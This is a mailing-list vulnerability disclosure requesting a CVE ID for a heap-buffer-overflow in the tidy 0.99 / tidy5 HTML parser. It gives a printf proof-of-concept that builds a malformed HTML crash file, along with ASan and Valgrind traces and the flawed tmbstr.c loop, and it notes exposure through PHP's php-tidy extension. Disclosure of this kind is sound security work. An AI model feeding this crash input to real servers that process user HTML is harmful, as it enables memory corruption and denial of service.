Re: CVE Request - tidy 0.99 / tidy5 heap-buffer-overflow

[Fernando Muñoz <fernando () null-life com>]

Any update about a CVE ID for this issue?

I forgot to mention, this could be also abused on PHP based
applications that use php-tidy extension with user supplied data.

On Thu, Jun 4, 2015 at 12:50 AM, Fernando Muñoz <fernando () null-life com> wrote:
> Hello ,
>
> I'd like to request a CVE ID for the following issue:
>
> tidy [1]  is affected by a write out of bounds when processing
> malformed html files.
> This issue could be abused on server side applications that use
> php-tidy extension with user input.
>
> The issue was confirmed, analysed and fixed by the tidy5 maintainer. [2]
>
> POC
>
> $ printf "\x3c\x61\x20\x62\x3d\x3c\x61\x20\x3c\x3f\x78\x6d
> \x0d\x3f\x3e\x62\x3d\x22\x63\x22\x47\x20\x68\x72\x65
> \x66\x3d\x22\x12\x22\xbb" > err.html
>
> An asan-enabled build of tidy outputs:
>
> $ tidy-asan err.html
> ====================================================
> ==2196==ERROR: AddressSanitizer: heap-buffer-overflow on address
> 0xb53006b1 at pc 0xb71df8fe bp 0xbfac9928 sp 0xbfac9918
> WRITE of size 1 at 0xb53006b1 thread T0
>     #0 0xb71df8fd in prvTidytmbstrndup (/usr/lib/libtidy-0.99.so.0+0x15c8fd)
>     #1 0xb7141060 in prvTidyGetToken (/usr/lib/libtidy-0.99.so.0+0xbe060)
>     #2 0xb711856e in prvTidyParseDocument (/usr/lib/libtidy-0.99.so.0+0x9556e)
>     #3 0xb71f2a58 in prvTidyDocParseStream (/usr/lib/libtidy-0.99.so.0+0x16fa58)
>     #4 0xb71f34a5 in tidyParseFile (/usr/lib/libtidy-0.99.so.0+0x1704a5)
>     #5 0x804bfa9 (/usr/bin/tidy+0x804bfa9)
>     #6 0xb6edf72d in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1872d)
>     #7 0x804fa4e (/usr/bin/tidy+0x804fa4e)
>
> 0xb53006b1 is located 0 bytes to the right of 1-byte region
> [0xb53006b0,0xb53006b1)
> allocated by thread T0 here:
>     #0 0xb72af18c in __interceptor_malloc
> (/usr/lib/i386-linux-gnu/libasan.so.1+0x5118c)
>     #1 0xb71c5963 (/usr/lib/libtidy-0.99.so.0+0x142963)
> ...
>
> Valgrind with the standard build:
>
> $ valgrind tidy err.html
> ...
> ==30499== Invalid write of size 1
> ==30499==    at 0x408805C: prvTidytmbstrndup (tmbstr.c:39)
> ==30499==    by 0x40738A8: ParseValue (lexer.c:3486)
> ...
>
> ==30499== Invalid write of size 1
> ==30499==    at 0x4088065: prvTidytmbstrndup (tmbstr.c:41)
> ==30499==    by 0x40738A8: ParseValue (lexer.c:3486)
> ==30499==    by 0x4075F39: ParseAttrs (lexer.c:3603)
> ==30499==    by 0x4075F39: GetTokenFromStream (lexer.c:2416)
>
> ...
> file: tmbstr.c
>
> 39        while ( len-- > 0 &&  (*cp++ = *str++) )
> 40          /**/;
> 41        *cp = 0;
>
> Credit: Fernando Muñoz
>
> [1] tidy.sourceforge.net
> [2] https://github.com/htacg/tidy-html5/issues/217